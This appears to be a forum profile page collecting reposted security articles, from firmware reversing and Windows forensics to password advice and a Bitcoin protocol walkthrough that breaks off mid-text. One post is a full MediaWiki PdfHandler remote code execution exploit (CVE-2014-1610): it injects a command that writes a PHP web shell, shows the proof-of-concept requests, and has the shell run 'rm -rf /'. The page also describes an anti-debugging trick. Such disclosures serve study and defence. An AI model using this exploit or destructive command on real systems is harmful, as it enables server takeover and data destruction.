-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
[h=3]The registration marathon is now live![/h] https://olympic-ctf.ru/register
-
Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup ianbeer@chromium.org tl?dr Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderersupplied pointer was freed to get code execution in the browser process by spraying multiple gigabytes of sharedmemory. Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit
-
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) From: Pichaya Morimoto <pichaya () ieee org> Date: Sat, 1 Feb 2014 22:28:51 +0700 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #################################################################### # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # #################################################################### # Exploit: #################################################################### 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "<?php%20system(\\$_GET[1]);">https://rstforums.com/forum/images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: #################################################################### thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php includes/filerepo/file/File.php # Vulnerability Analysis: #################################################################### 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image <? ... 1.1 Called directly, use $_GET params wfThumbHandleRequest(); 1.2 Handle a thumbnail request via query parameters function wfThumbHandleRequest() { $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET; wfStreamThumb( $params ); // stream the thumbnail } 1.3 Stream a thumbnail specified by parameters function wfStreamThumb( array $params ) { ... $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here ... // Backwards compatibility parameters if ( isset( $params['w'] ) ) { $params['width'] = $params['w']; // << Inject os cmd here! unset( $params['w'] ); } ... $img = wfLocalFile( $fileName ); ... // Thumbnail isn't already there, so create the new thumbnail... $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php <? ... function transform( $params, $flags = 0 ) { ... $handler = $this->getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php <? ... function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { ... $width = $params['width']; ... $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}"; $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath ); $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor ); $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument $cmd .= wfEscapeShellArg( $dstPath ) . ")"; $cmd .= " 2>&1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits <? ... function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) { ... passthru( $cmd, $retval ); // << Execute here!! POC: GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02 <html><head><title>Error generating thumbnail</title></head> <body> <h1>Error generating thumbnail</h1> <p> ?????????????????????????????: /bin/bash: -: command not found<br /> convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br /> GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> </p> </body> </html> GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 uid=33(www-data) gid=33(www-data) groups=33(www-data) # Back-end $cmd #################################################################### GlobalFunctions.php : wfShellExec() cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1 Sursa: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-
[h=3]MS Word 2013 Reading Locations[/h]Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed. After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored. When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Screenshot of Reading Locations Subkey[/TD] [/TR] [/TABLE] Datetime Value The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM. File Path Value The File Path value is the fully qualified file name. Position Value The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document. [h=4]Forensic Implications[/h] Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated, however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten. Posted by Jason Hale at 11:51 PM Sursa: Digital Forensics Stream: MS Word 2013 Reading Locations
-
Yahoo Hacked And How To Protect Your Passwords James Lyne, Contributor Yahoo yesterday announced that Yahoo mail has been the focus of a co-ordinated hack and that at this time it has confirmed a number of users e-mail accounts have been compromised – you may be one of them (and if you are see below for my top tips on how to secure your passwords going forward). It is not clear how many users have been compromised, or exactly how. Yahoo don’t have a history of providing much information but it would be prudent for any Yahoo mail users to take precautions (more on that below). Between the vague statements about malicious code and “a third party was probably to blame” Yahoo has been resetting the credentials of affected users via e-mail and SMS if your mobile is on file. Whilst details are scarce at this time this continues a trend of bad security and resilience news for Yahoo who experienced a multitude of issues in 2013. The company made clear in their announcement that a third party database with shared credentials was likely the source and that they had no evidence the usernames and passwords were taken directly form their systems. Whether the third party was one they provided data to, or whether it was a random third party with shared credentials is not particularly clear. There is insufficient detail to lay blame at this time, but certainly it would be prudent to take steps to secure yourself. More broadly, the last couple of years have seen a significant spike in the theft of passwords (or their hashed or encrypted representations) from online services as cyber criminals moved beyond financial information as their sole form of profit. Whilst we all wait with bated breath for further details of the compromise now would be a very good time to upgrade your password. Many providers are very behind the time on password security, but at least you can take steps to minimise the risks. Here are a few tips on how to do it: Avoid using the same password across multiple sites and services. That way, if Yahoo credentials are breached hackers won’t be able to jump across in to your Twitter, online banking, work accounts or alike. I know this presents a memory challenge for some users, but see the below tip on password managers. Choose a password which is not easy to guess. Words with a dictionary root followed by numerals are very common choices and predictable patterns that cyber criminals can use to crack your password very fast. Passwords should be long, phrase based and involve a balance of different types of characters – numbers, letters, capitols and ideally a few symbols. See my fabulous example below. Set up password change/reset mechanisms properly – not obviously. Password reset forms on many services ask questions like “Where did you go to school?” or “In which year were you born?”. These questions are easy to answer and can typically be mined from social media pages or the Internet — why would hackers guess your password if they can just tell a system where you went to school and how old you are (you did after all announce your birthday last year on Twitter and your age, didn’t you?). Instead I suggest lying on the Internet. Come up with a scheme of answers to these questions that you won’t forget (or store securely) or better still, if the service allows, specify your own difficult questions. Bigger = better! When passwords are stolen from providers they are typically in a hashed or encrypted form, a bit like this ’5f4dcc3b5aa765d61d8327deb882cf99?. This is a hashed password representation and using clever techniques and computing power attackers can reverse the original password and log in to your account. When they steal these hashes it is only a matter of time and effort until they reveal the original. Short passwords might be guessed in second to minutes or hours (it depends on the implementation), where very long passwords could take years of work (and the cyber criminals are likely to go after someone else). Therefore making your password 60 characters makes life much harder for the cyber criminals if they do manage to break in to a service like Yahoo. This of course all assumes the provider isn’t just storing your password in clear text – in which case you will be very glad of tip number 1! Use a password manager. Password managers generate strong unique passwords for each of your services and then store them in an encrypted database which you can unlock with one good master password. It is a reasonable compromise for those that do not have an amazing memory but don’t want to fall in to the pitfall of repeating similar passwords across multiple sites. See below for more information on how this works. Register to a breach monitoring service. There are a variety of services on the Internet now which monitor for visible lists of stolen usernames/passwords. Of course, not all breaches are visible so it is far from a complete list. That said, if your username shows up it will e-mail you a notification and tell you it is time to change. Despite numerous proposals of authentication mechanisms to replace the password it is still the cheapest, easiest to deploy ubiquitous form of authentication used. So we should all take some steps to make sure we are using them properly. A good password manager allows you to generate secure passwords for each of your sites and avoid duplication — luckily you don’t have to type these beastly long passwords out, the tools do that for you. Here is an example of a password recipe for a new password: A password recipe for a new password courtesy of 1Password for Mac OS X You can specify the length of the password (some providers don’t allow unlimited length but arbitrarily restrict you to say 16 characters e.g. Microsoft 365 exchange. Grumble grumble.) and the make up of symbols and numbers. You can even make it pronounceable for a situation where you might have to actually read the password out (though I don’t recommend this for obvious reasons). Each time you click the button you get a nice new secure password which the password manager automatically associates with the website in question so that you can auto log in each time remembering just one secure password you specify. Not all password managers are created equal so it is worth shopping around a little before you commit, but these tools can take the average users password security from poor to really rather good in an afternoon password changing party. Lastly, it is important you keep a back up of the password encrypted database (loosing all your passwords in one place would be painful) and you may want to think twice about putting the keys to your whole life in there – my banking details for example would not be in this application. So why not make something good from another password breach and share these tips with your friends, family and colleagues. I await with baited breath news from a reader that they’ve successfully made all their passwords over 128 characters. Sursa: Yahoo Hacked And How To Protect Your Passwords - Forbes
-
XSS and MySQL FILE Difficulty Beginner Details This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. What you will learn? Cross-Site Scripting exploitation MySQL injection with FILE privilege Requirements A computer with a virtualisation software A basic understanding of HTTP A basic understanding of PHP Yes, that's it! Download xss_and_mysql_file.pdf (579K) xss_and_mysql_file.iso (64-bit, 189M, MD5: e95459511a4aebb51d0de6cd04a016df) xss_and_mysql_file_i386.iso (32-bit, 178M, MD5: c9c7a31ab9bf79b82b72b58bb0a3a657) Sursa: https://pentesterlab.com/exercises/xss_and_mysql_file/
-
Reversing the WRT120N’s Firmware Obfuscation By Craig | February 2, 2014 It was recently brought to my attention that the firmware updates for the Linksys WRT120N were employing some unknown obfuscation. I thought this sounded interesting and decided to take a look. The latest firmware update for the WRT120N didn’t give me much to work with: Binwalk firmware update analysis As you can see, there is a small LZMA compressed block of data; this turned out to just be the HTML files for the router’s web interface. The majority of the firmware image is unidentified and very random. With nothing else to go on, curiosity got the best of me and I ordered one (truly, Amazon Prime is not the best thing to ever happen to my bank account). Hardware Analysis A first glance at the hardware showed that the WRT120N had a Atheros AR7240 SoC, a 2MB SPI flash chip, 32MB of RAM, and what appeared to be some serial and JTAG headers: WRT120N PCB Looking to get some more insight into the device’s boot process, I started with the serial port: UART Header I’ve talked about serial ports in detail elsewhere, so I won’t dwell on the methods used here. However, with a quick visual inspection and a multimeter it was easy to identify the serial port’s pinout as: Pin 2 – RX Pin 3 – TX Pin 5 – Ground The serial port runs at 115200 baud and provided some nice debug boot info: $ sudo miniterm.py /dev/ttyUSB0 115200 --- Miniterm on /dev/ttyUSB0: 115200,8,N,1 --- --- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H --- ======================================================================= Wireless Router WG7005G11-LF-88 Loader v0.03 build Feb 5 2009 15:59:08 Arcadyan Technology Corporation ======================================================================= flash MX25L1605D found. Copying boot params.....DONE Press Space Bar 3 times to enter command mode ... Flash Checking Passed. Unzipping firmware at 0x80002000 ... [ZIP 3] [ZIP 1] done In c_entry() function ... install_exception install exception handler ... install interrupt handler ... ulVal: 0x484fb Set GPIO #11 to OUTPUT Set GPIO #1 to OUTPUT Set GPIO #0 to OUTPUT Set GPIO #6 to INPUT Set GPIO #12 to INPUT Timer 0 is requested ##### _ftext = 0x80002000 ##### _fdata = 0x80447420 ##### __bss_start = 0x804D5B04 ##### end = 0x81869518 ##### Backup Data from 0x80447420 to 0x81871518~0x818FFBFC len 583396 ##### Backup Data completed ##### Backup Data verified [INIT] HardwareStartup .. [INIT] System Log Pool startup ... [INIT] MTinitialize .. CPU Clock 350000000 Hz init_US_counter : time1 = 270713 , time2 = 40272580, diff 40001867 US_counter = 70 cnt1 41254774 cnt2 41256561, diff 1787 Runtime code version: v1.0.04 System startup... [INIT] Memory COLOR 0, 1600000 bytes .. [INIT] Memory COLOR 1, 1048576 bytes .. [INIT] Memory COLOR 2, 2089200 bytes .. [INIT] tcpip_startup .. Data size: 1248266 e89754967e337d9f35e8290e231c9f92 Set flash memory layout to Boot Parameters found !!! Bootcode version: v0.03 Serial number: JUT00L602233 Hardware version: 01A ... The firmware looked to have been made by Arcadyan, and the ‘Unzipping firmware…’ message was particularly interesting; a bit of Googling turned up this post on reversing Arcadyan firmware obfuscation, though it appears to be different from the obfuscation used by the WRT120N. The only interaction with the serial port was via the bootloader menu. During bootup you can break into the bootloader menu (press the space bar three times when prompted) and perform a few actions, like erasing flash and setting board options: Press Space Bar 3 times to enter command mode ...123 Yes, Enter command mode ... [WG7005G11-LF-88 Boot]:? ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== Unfortunately, the bootloader doesn’t appear to provide any options for dumping the contents of RAM or flash. Although there is a JTAG header on the board, I opted for dumping the flash chip directly since JTAG dumps tend to be slow, and interfacing directly with SPI flash is trivial. Pretty much anything that can speak SPI can be used to read the flash chip; I used an FTDI C232HM cable and the spiflash.py utility included with libmpsse: $ sudo spiflash --read=flash.bin --size=$((0x200000)) --verify FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz Reading 2097152 bytes starting at address 0x0...saved to flash.bin. Verifying...success. The flash chip contains three LZMA compressed blocks and some MIPS code, but the main firmware image is still unknown: Flash analysis The first two blocks of LZMA compressed data are part of an alternate recovery image, and the MIPS code is the bootloader. Besides some footer data, the rest of the flash chip simply contains a verbatim copy of the firmware update file. Bootloader Analysis The bootloader, besides being responsible for de-obfuscating and loading the firmware image into memory, contains some interesting tidbits. I’ll skip the boring parts in which I find the bootloader’s load address, manually identify standard C functions, resolve jump table offsets, etc, and get to the good stuff. First, very early in the boot process, the bootloader checks to see if the reset button has been pressed. If so, it starts up the “Tiny_ETCPIP_Kernel” image, which is the small LZMA-compressed recovery image, complete with a web interface: Unzipping Tiny Kernel This is nice to know; if you ever end up with a bad firmware update, holding the reset button during boot will allow you to un-brick your router. There is also a hidden administrator mode in the bootloader’s UART menu: Hidden bootloader menu Entering an option of ! will enable “administrator mode”; this unlocks a few other options, including the ability to read and write to memory: [WG7005G11-LF-88 Boot]:! Enter Administrator Mode ! ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [M] Upload to Memory [R] Read from Memory [W] Write to Memory [Y] Go to Memory [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== [WG7005G11-LF-88 Boot]: The most interesting part of the bootloader, of course, is the code that loads the obfuscated firmware image into memory. Obfuscation Analysis De-obfuscation is performed by the load_os function, which is passed a pointer to the obfuscated image as well as an address where the image should be copied into memory: The de-obfuscation routine inside load_os is not complicated: De-obfuscation routine Basically, if the firmware image starts with the bytes 04 01 09 20 (which our obfuscated firmware image does), it enters the de-obfuscation routine which: Swaps the two 32-byte blocks of data at offsets 0×04 and 0×68. Nibble-swaps the first 32 bytes starting at offset 0×04 Byte-swaps each of the adjacent 32 bytes starting at offset 0×04 At this point, the data at offset 0×04 contains a valid LZMA header, which is then decompressed. Implementing a de-obfuscation tool was trivial, and the WRT120N firmware can now be de-obfuscated and de-compressed: $ ./wrt120n ./firmware/FW_WRT120N_1.0.07.002_US.bin ./deobfuscated.bin Doing block swap... Doing nibble-swap... Doing byte-swap... Saving data to ./deobfuscated.bin... Done! Analysis of de-obfuscated firmware The de-obfuscation utility can be downloaded here for those interested. Sursa: Reversing the WRT120N’s Firmware Obfuscation - /dev/ttyS0
-
Anti-Debugging trick : Checking for the Low Fragmentation Heap Hi everyone, I’ll introduce you today a Anti-debugging trick which the idea came across my mind while debugging Windows Heap, I don’t know if it was used before anywhere but here I am showing it today. Check the C/C++ source code : [C++] LFH anti-debugging trick - Pastebin.com Short introduction to the Windows front end allocator : First of all let me define what a LFH (low fragmentation heap) is : The LFH was introduced in Windows XP and Windows Server 2003 but it wasn’t used as a default front end allocator until Windows Vista. The default front end allocator were the lookaside lists (LAL) , each of these 2 is a singly linked list with 128 entries. The LFH as its name describes is implemented to guarantee that heap fragmentation will be reduced and it’s strongly recommended to use for application that allocate a big number of small size blocks. When the LFH is created first, predetermined sizes of memory will be allocated and put into buckets (LFH entries), when the application will call for an allocation the LFH will provide the smallest available block to satisfy the allocation , otherwise the request will be passed into the heap manager then to the Freelists (check explanation later). When LAL is used as a front end allocator, a block won’t reside in a list of its list until it was allocated either from the FreeLists or by committing memory then freed. All that won’t apply until a list of the lookaside table can handle the freed block otherwise it will passed to the Heap manager to perform coalescing if two adjacent blocks are free, change bitmap values, invalidate coalesced block entry then insert the coalesced block into its valid list in the FreeLists. If no block coalescing is possible the block is inserted directly in the FreeLists. Anti-Debugging Trick : I noticed that when the executable is run under a debugger no Low Fragmentation Heap (LFH) is created for it so the pointer to the LFH equals NULL. So we’ll just have to check if the pointer to LFH is null to detect if the process was created inside a debugger. I tried after to run the process outside the debugger then attach it and I noticed that a LFH is created for the heap and the pointer to the LFH is valid. The pointer to the LFH is located at “heap_handle+0xd4” under Windows 7 for 32-bit executables and at “heap_handle+0×178” for 64-bit executable. I attached the debugger to the process : 0:001> dt _HEAP 00460000 ntdll!_HEAP +0×000 Entry : _HEAP_ENTRY +0×008 SegmentSignature : 0xffeeffee +0x00c SegmentFlags : 0 [...] +0x0d0 CommitRoutine : 0x5b16148e +0x0d4 FrontEndHeap : 0x00468cf0 Void <– Pointer to the FEA +0x0d8 FrontHeapLockCount : 0 +0x0da FrontEndHeapType : 0×2 <– Type : LFH +0x0dc Counters : _HEAP_COUNTERS +0×130 TuningParameters : _HEAP_TUNING_PARAMETERS When running the process from the debugger LFH won’t be enabled : 0:001> dt _HEAP 00320000 ntdll!_HEAP +0×000 Entry : _HEAP_ENTRY +0×008 SegmentSignature : 0xffeeffee +0x00c SegmentFlags : 0 [...] +0x0cc LockVariable : 0×00320138 _HEAP_LOCK +0x0d0 CommitRoutine : 0x6d58ec0e long +6d58ec0e +0x0d4 FrontEndHeap : (null) +0x0d8 FrontHeapLockCount : 0 +0x0da FrontEndHeapType : 0 +0x0dc Counters : _HEAP_COUNTERS +0×130 TuningParameters : _HEAP_TUNING_PARAMETERS Remember that, The LFH isn’t used by default until Windows Vista and posterior versions , so to implement the anti-debugging technique under Windows XP we’ll need to enable the LFH as it’s not used by default, to do so you’ll simply need to call HeapSetInformation with the HEAP_INFORMATION_CLASS set to ’0? and with the pointer to the information buffer pointing to “0×2? which will enable the LFH for the heap passed as the first argument. A simple way to bypass this technique is simply by attaching the debugger to the application instead of running it from a debugger . More details on the LFH : here Thanks for your time Souhail Hammou. Sursa: ITSecurity.ma – Information Security and Ethical Hacking Community Anti-Debugging trick : Checking for the Low Fragmentation Heap - ITSecurity.ma - Information Security and Ethical Hacking Community
-
Bitcoins the hard way: Using the raw Bitcoin protocol All the recent media attention on Bitcoin inspired me to learn how Bitcoin really works, right down to the bytes flowing through the network. Normal people use software[1] that hides what is really going on, but I wanted to get a hands-on understanding of the Bitcoin protocol. My goal was to use the Bitcoin system directly: create a Bitcoin transaction manually, feed it into the system as hex data, and see how it gets processed. This turned out to be considerably harder than I expected, but I learned a lot in the process and hopefully you will find it interesting. This blog post starts with a quick overview of Bitcoin and then jumps into the low-level details: creating a Bitcoin address, making a transaction, signing the transaction, feeding the transaction into the peer-to-peer network, and observing the results. A quick overview of Bitcoin I'll start with a quick overview of how Bitcoin works[2], before diving into the details. Bitcoin is a relatively new digital currency[3] that can be transmitted across the Internet. You can buy bitcoins[4] with dollars or other traditional money from sites such as Coinbase or MtGox[5], send bitcoins to other people, buy things with them at some places, and exchange bitcoins back into dollars. To simplify slightly, bitcoins consist of entries in a distributed database that keeps track of the ownership of bitcoins. Unlike a bank, bitcoins are not tied to users or accounts. Instead bitcoins are owned by a Bitcoin address, for example 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa. Bitcoin transactions A transaction is the mechanism for spending bitcoins. In a transaction, the owner of some bitcoins transfers ownership to a new address. A key innovation of Bitcoin is how transactions are recorded in the distributed database through mining. Transactions are grouped into blocks and about every 10 minutes a new block of transactions is sent out, becoming part of the transaction log known as the blockchain, which indicates the transaction has been made (more-or-less) official.[6] Bitcoin mining is the process that puts transactions into a block, to make sure everyone has a consistent view of the transaction log. To mine a block, miners must find an extremely rare solution to an (otherwise-pointless) cryptographic problem. Finding this solution generates a mined block, which becomes part of the official block chain. Mining is also the mechanism for new bitcoins to enter the system. When a block is successfully mined, new bitcoins are generated in the block and paid to the miner. This mining bounty is large - currently 25 bitcoins per block (about $19,000). In addition, the miner gets any fees associated with the transactions in the block. Because of this, mining is very competitive with many people attempting to mine blocks. The difficulty and competitiveness of mining is a key part of Bitcoin security, since it ensures that nobody can flood the system with bad blocks. The peer-to-peer network There is no centralized Bitcoin server. Instead, Bitcoin runs on a peer-to-peer network. If you run a Bitcoin client, you become part of that network. The nodes on the network exchange transactions, blocks, and addresses of other peers with each other. When you first connect to the network, your client downloads the blockchain from some random node or nodes. In turn, your client may provide data to other nodes. When you create a Bitcoin transaction, you send it to some peer, who sends it to other peers, and so on, until it reaches the entire network. Miners pick up your transaction, generate a mined block containing your transaction, and send this mined block to peers. Eventually your client will receive the block and your client shows that the transaction was processed. Cryptography Bitcoin uses digital signatures to ensure that only the owner of bitcoins can spend them. The owner of a Bitcoin address has the private key associated with the address. To spend bitcoins, they sign the transaction with this private key, which proves they are the owner. (It's somewhat like signing a physical check to make it valid.) A public key is associated with each Bitcoin address, and anyone can use it to verify the digital signature. Blocks and transactions are identified by a 256-bit cryptographic hash of their contents. This hash value is used in multiple places in the Bitcoin protocol. In addition, finding a special hash is the difficult task in mining a block. Bitcoins do not really look like this. Photo credit: Antana, CC:by-sa Diving into the raw Bitcoin protocol The remainder of this article discusses, step by step, how I used the raw Bitcoin protocol. First I generated a Bitcoin address and keys. Next I made a transaction to move a small amount of bitcoins to this address. Signing this transaction took me a lot of time and difficulty. Finally, I fed this transaction into the Bitcoin peer-to-peer network and waited for it to get mined. The remainder of this article describes these steps in detail. It turns out that actually using the Bitcoin protocol is harder than I expected. As you will see, the protocol is a bit of a jumble: it uses big-endian numbers, little-endian numbers, fixed-length numbers, variable-length numbers, custom encodings, DER encoding, and a variety of cryptographic algorithms, seemingly arbitrarily. As a result, there's a lot of annoying manipulation to get data into the right format.[7] The second complication with using the protocol directly is that being cryptographic, it is very unforgiving. If you get one byte wrong, the transaction is rejected with no clue as to where the problem is.[8] The final difficulty I encountered is that the process of signing a transaction is much more difficult than necessary, with a lot of details that need to be correct. In particular, the version of a transaction that gets signed is very different from the version that actually gets used. Bitcoin addresses and keys My first step was to create a Bitcoin address. Normally you use Bitcoin client software to create an address and the associated keys. However, I wrote some Python code to create the address, showing exactly what goes on behind the scenes. Bitcoin uses a variety of keys and addresses, so the following diagram may help explain them. You start by creating a random 256-bit private key. The private key is needed to sign a transaction and thus transfer (spend) bitcoins. Thus, the private key must be kept secret or else your bitcoins can be stolen. The Elliptic Curve DSA algorithm generates a 512-bit public key from the private key. (Elliptic curve cryptography will be discussed later.) This public key is used to verify the signature on a transaction. Inconveniently, the Bitcoin protocol adds a prefix of 04 to the public key. The public key is not revealed until a transaction is signed, unlike most systems where the public key is made public. How bitcoin keys and addresses are related The next step is to generate the Bitcoin address that is shared with others. Since the 512-bit public key is inconveniently large, it is hashed down to 160 bits using the SHA-256 and RIPEM hash algorithms.[9] The key is then encoded in ASCII using Bitcoin's custom Base58Check encoding.[10] The resulting address, such as 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, is the address people publish in order to receive bitcoins. Note that you cannot determine the public key or the private key from the address. If you lose your private key (for instance by throwing out your hard drive), your bitcoins are lost forever. Finally, the Wallet Interchange Format key (WIF) is used to add a private key to your client wallet software. This is simply a Base58Check encoding of the private key into ASCII, which is easily reversed to obtain the 256-bit private key. To summarize, there are three types of keys: the private key, the public key, and the hash of the public key, and they are represented externally in ASCII using Base58Check encoding. The private key is the important key, since it is required to access the bitcoins and the other keys can be generated from it. The public key hash is the Bitcoin address you see published. I used the following code snippet[11] to generate a private key in WIF format and an address. The private key is simply a random 256-bit number. The ECDSA crypto library generates the public key from the private key.[12] The Bitcoin address is generated by SHA-256 hashing, RIPEM-160 hashing, and then Base58 encoding with checksum. Finally, the private key is encoded in Base58Check to generate the WIF encoding used to enter a private key into Bitcoin client software.[1] Inside a transaction A transaction is the basic operation in the Bitcoin system. You might expect that a transaction simply moves some bitcoins from one address to another address, but it's more complicated than that. A Bitcoin transaction moves bitcoins between one or more inputs and outputs. Each input is a transaction and address supplying bitcoins. Each output is an address receiving bitcoin, along with the amount of bitcoins going to that address. A sample Bitcoin transaction. Transaction C spends .008 bitcoins from Transactions A and B. The diagram above shows a sample transaction "C". In this transaction, .005 BTC are taken from an address in Transaction A, and .003 BTC are taken from an address in Transaction B. (Note that arrows are references to the previous outputs, so are backwards to the flow of bitcoins.) For the outputs, .003 BTC are directed to the first address and .004 BTC are directed to the second address. The leftover .001 BTC goes to the miner of the block as a fee. Note that the .015 BTC in the other output of Transaction A is not spent in this transaction. Each input used must be entirely spent in a transaction. If an address received 100 bitcoins in a transaction and you just want to spend 1 bitcoin, the transaction must spend all 100. The solution is to use a second output for change, which returns the 99 leftover bitcoins back to you. Transactions can also include fees. If there are any bitcoins left over after adding up the inputs and subtracting the outputs, the remainder is a fee paid to the miner. The fee isn't strictly required, but transactions without a fee will be a low priority for miners and may not be processed for days or may be discarded entirely.[13] A typical fee for a transaction is 0.0002 bitcoins (about 20 cents), so fees are low but not trivial. Manually creating a transaction For my experiment I used a simple transaction with one input and one output, which is shown below. I started by bying bitcoins from Coinbase and putting 0.00101234 bitcoins into address 1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5, which was transaction 81b4c832.... My goal was to create a transaction to transfer these bitcoins to the address I created above, 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, subtracting a fee of 0.0001 bitcoins. Thus, the destination address will receive 0.00091234 bitcoins. Structure of the example Bitcoin transaction. Following the specification, the unsigned transaction can be assembled fairly easily, as shown below. There is one input, which is using output 0 (the first output) from transaction 81b4c832.... Note that this transaction hash is inconveniently reversed in the transaction. The output amount is 0.00091234 bitcoins (91234 is 0x016462 in hex), which is stored in the value field in little-endian form. The cryptographic parts - scriptSig and 